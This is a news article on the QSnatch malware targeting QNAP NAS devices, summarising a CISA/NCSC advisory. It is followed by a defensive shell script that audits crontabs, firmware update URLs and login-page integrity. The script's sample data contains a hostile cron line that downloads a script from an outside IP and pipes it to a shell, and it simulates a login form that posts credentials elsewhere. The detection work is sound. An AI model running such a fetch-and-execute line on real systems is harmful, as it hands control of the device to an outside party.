In November 2019, German and Finnish information security specialists discovered malware affecting QNAP NAS devices. Back then, it was reported that the malware, dubbed QSnatch, had infected more than 7,000 devices in Germany alone.
Once on a device, the malware modifies the firmware so that it survives reboots and updates. QSnatch is also able to:
- modify scheduled tasks and startup scripts (cron jobs, init scripts);
- block firmware updates by rewriting the URLs of the update source;
- prevent the QNAP MalwareRemover security application from running;
- harvest and exfiltrate the usernames and passwords of all NAS users.
Now the US Cybersecurity and Infrastructure Security Agency (CISA), part of the Department of Homeland Security, together with the UK National Cyber Security Centre (NCSC), report that QSnatch continues to spread.
According to the two agencies, the malware first appeared in 2014 but only became a real threat in the past year. At the end of 2019 roughly 7,000 devices were infected; by mid-2020 the count exceeded 62,000. CISA and NCSC estimate that approximately 7,600 of the infected devices are in the United States and about 3,900 in the UK.
The agencies describe two campaigns: the first began in 2014 and lasted until mid-2017, while the second began in 2018 and was still active at the end of 2019.
The campaigns used different versions of QSnatch, and the joint advisory focuses on the latest version, used in the most recent campaign. This version ships with an expanded feature set and includes the following modules:
- CGI password logger: installs a fake copy of the device's administrative login page, records every successful authentication and then passes the victim through to the legitimate login page;
- credential scraper: collects stored credentials from the device;
- SSH backdoor: lets the operators execute arbitrary code on the device;
- exfiltration: when run, QSnatch collects a predefined list of files, including configuration files and logs, encrypts them with the attackers' public key and sends them to the attackers over HTTPS;
- web shell for remote access.
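The behaviors listed above (tampered cron jobs and init scripts, a rewritten update URL, a replaced login page) are all things an administrator can check for from a shell on the device. The following POSIX shell audit is an added example, not code from QNAP, CISA or NCSC: it flags crontab entries that are absent from a known-good baseline or show classic persistence tells, rejects an update URL whose host is not under the vendor domain, and verifies the web root against a sha256 manifest recorded from a clean install. The `qnap.com` allowlist, the cron heuristics, and the sample crontab, manifest and URLs are all constructed assumptions for the demonstration; real config file locations are firmware-specific and are passed in as arguments rather than hard-coded.

```shell
#!/bin/sh
# Added audit example, not code from QNAP, CISA or NCSC. The vendor-domain
# allowlist, the cron heuristics and all sample data below are assumptions
# constructed for the demonstration; real config file locations are
# firmware-specific and are passed in as arguments instead of hard-coded.
set -u

UPDATE_HOST_ALLOW='qnap.com'   # assumed legitimate firmware update domain

sha256() {
    # Portable wrapper: GNU/busybox sha256sum, or shasum on BSD/macOS.
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$@"; else shasum -a 256 "$@"; fi
}

# 1. Scheduled tasks. Flags crontab entries that are absent from a known-good
#    baseline, run from a scratch or hidden directory, or pipe a download into
#    a shell. Prints one CRON line per finding; returns 1 if anything was flagged.
audit_crontab() {
    current=$1; baseline=$2; flagged=0
    while IFS= read -r line; do
        case $line in ''|'#'*) continue ;; esac
        reason=''
        grep -qxF -- "$line" "$baseline" || reason='not in baseline'
        case $line in
            *' /tmp/'*|*' /var/tmp/'*|*' /dev/shm/'*) reason="${reason:+$reason; }scratch directory" ;;
        esac
        case $line in *'/.'*) reason="${reason:+$reason; }hidden path" ;; esac
        case $line in
            *curl*'|'*sh*|*wget*'|'*sh*) reason="${reason:+$reason; }download piped to shell" ;;
        esac
        if [ -n "$reason" ]; then
            printf 'CRON  %s  <- %s\n' "$line" "$reason"
            flagged=$((flagged + 1))
        fi
    done < "$current"
    [ "$flagged" -eq 0 ]
}

# 2. Firmware update source. QSnatch blocks updates by rewriting the update
#    URL, so the configured URL's host must sit under the vendor domain. The
#    host is parsed defensively so that "http://qnap.com@evil/..." is not
#    mistaken for the vendor. Returns 1 if the host is not allowed.
check_update_url() {
    url=$1
    host=${url#*://}; host=${host%%/*}; host=${host#*@}; host=${host%%:*}
    case $host in
        "$UPDATE_HOST_ALLOW"|*".$UPDATE_HOST_ALLOW") return 0 ;;
    esac
    printf 'UPDATE  %s  <- host "%s" is not under %s\n' "$url" "$host" "$UPDATE_HOST_ALLOW"
    return 1
}

# 3. Login page integrity. The CGI password logger replaces the admin login
#    page, so compare the web root against a sha256 manifest recorded from a
#    clean install (regenerate it after every legitimate firmware update).
#    Returns 1 if any listed file is missing or modified.
verify_web_files() {
    manifest=$1; webroot=$2; bad=0
    while read -r expected path; do
        actual=$(sha256 "$webroot/$path" 2>/dev/null | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            if [ -n "$actual" ]; then why='hash mismatch'; else why='missing'; fi
            printf 'WEB  %s  <- %s\n' "$path" "$why"
            bad=$((bad + 1))
        fi
    done < "$manifest"
    [ "$bad" -eq 0 ]
}

# --- constructed sample data (not taken from a real device) ---
SAMPLE=$(mktemp -d); trap 'rm -rf "$SAMPLE"' EXIT
cat > "$SAMPLE/crontab.baseline" <<'EOF'
0 3 * * * /usr/local/bin/backup.sh
15 * * * * /usr/local/bin/rotate_logs.sh
EOF
cat > "$SAMPLE/crontab" <<'EOF'
# baseline entries plus three injected ones
0 3 * * * /usr/local/bin/backup.sh
15 * * * * /usr/local/bin/rotate_logs.sh
*/5 * * * * /tmp/.cache/run.sh
30 4 * * * wget -qO- http://198.51.100.7/a.sh | sh
0 1 * * * /usr/local/bin/backup.sh --all
EOF
mkdir "$SAMPLE/web"
printf '<form action="/cgi-bin/login.cgi">\n' > "$SAMPLE/web/login.html"
printf 'body {}\n' > "$SAMPLE/web/style.css"
(cd "$SAMPLE/web" && sha256 login.html style.css) > "$SAMPLE/manifest"
# simulate the password logger swapping in a page that posts elsewhere
printf '<form action="http://198.51.100.7/login.cgi">\n' > "$SAMPLE/web/login.html"

# Run all three checks; each prints its findings and signals them via exit code.
audit_crontab "$SAMPLE/crontab" "$SAMPLE/crontab.baseline" || echo 'crontab: FINDINGS'
check_update_url 'http://qnap.com@198.51.100.7/firmware.img' || echo 'update url: FINDINGS'
verify_web_files "$SAMPLE/manifest" "$SAMPLE/web" || echo 'web files: FINDINGS'
```

On a real device, point `audit_crontab` at the live crontab and a baseline captured right after a clean install, feed `check_update_url` the URL from the device's own update configuration, and regenerate the manifest after every legitimate firmware update so that `verify_web_files` only fires on unexpected changes.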
Notably, although CISA and NCSC were able to analyze the latest version of QSnatch, they still have not established how the malware gets onto devices. Exploitation of vulnerabilities in the QNAP firmware or brute-forcing of the default administrator password are plausible vectors, but neither has been confirmed.
The agencies point out that QNAP published guidance on securing devices against QSnatch well before this advisory, and urge users and administrators to apply it.